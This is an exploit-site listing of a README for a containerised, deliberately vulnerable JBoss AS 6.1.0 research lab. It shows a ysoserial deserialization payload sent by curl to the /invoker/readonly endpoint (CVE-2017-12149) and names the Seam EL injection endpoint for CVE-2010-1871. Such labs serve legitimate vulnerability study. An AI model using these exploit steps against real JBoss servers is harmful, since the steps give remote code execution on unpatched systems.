Exploit for Deserialization of Untrusted Data in Redhat Jboss_Enterprise_Application_Platform CVE-2010-1871 CVE-2017-12149

Name: Exploit for Deserialization of Untrusted Data in Redhat Jboss_Enterprise_Application_Platform CVE-2010-1871 CVE-2017-12149
Rating: 5 (220 reviews)

2026-01-01 | CVSS 9.8

## https://sploitus.com/exploit?id=A5248B53-BEE2-5BBA-B168-827C0C64F360
Many critical industries (banking, healthcare, and manufacturing) rely on legacy middleware that was built to run specifically on JBoss 5 or 6. Because these applications are often too fragile to migrate to modern versions of WildFly (the successor to JBoss), organizations choose to "air-gap" or hide them behind VPNs rather than patching them. When those perimeter defenses fail, the vulnerability is still sitting there, live and unpatched.

# JBoss AS 6.1.0 Vulnerability Research Lab

This repository provides a containerized JBoss Application Server 6.1.0 environment specifically configured for security research and vulnerability verification. It is designed to demonstrate Java Deserialization and JBoss Seam EL Injection flaws.

---

##  Quick Start

### 1. Build and Launch
To ensure the custom credentials and configurations are correctly applied, build the container from scratch:

```bash
docker-compose build --no-cache
docker-compose up -d
```

### 2. Access the Environment
JBoss Console: http://localhost:8080/admin-console/

Username: admin

Password: admin


Verified Vulnerabilities
#### 1. Java Deserialization (CVE-2017-12149)
The most reliable exploit path in this environment is through the HTTPServerILServlet located at /invoker/readonly.

Verification Steps:

Generate a payload using ysoserial to create a file in /tmp:

Bash

java -jar ysoserial-all.jar CommonsCollections6 "touch /tmp/pwned" > poc.ser
Send the binary payload via curl:

Bash

curl -v -X POST --data-binary @poc.ser http://localhost:8080/invoker/readonly
Confirm the exploit worked:

Bash

docker exec -it jboss-vulnerability-lab ls /tmp/pwned
####  2. JBoss Seam EL Injection (CVE-2010-1871)
The Admin Console is powered by the JBoss Seam framework.

Endpoint: /admin-console/login.seam

Parameter: actionOutcome

Current Status: Under Research. Standard payloads trigger a 302 Redirect to error.seam, indicating the Seam engine is processing input but potentially filtering specific characters.


Security Disclaimer
This environment is intentionally vulnerable. It contains unpatched, end-of-life software.

DO NOT deploy this on a public-facing server.

DO NOT use these tools on systems you do not have explicit permission to test.

Developed for educational purposes and security research.

Dependencies: [https://github.com/frohoff/ysoserial](https://github.com/frohoff/ysoserial)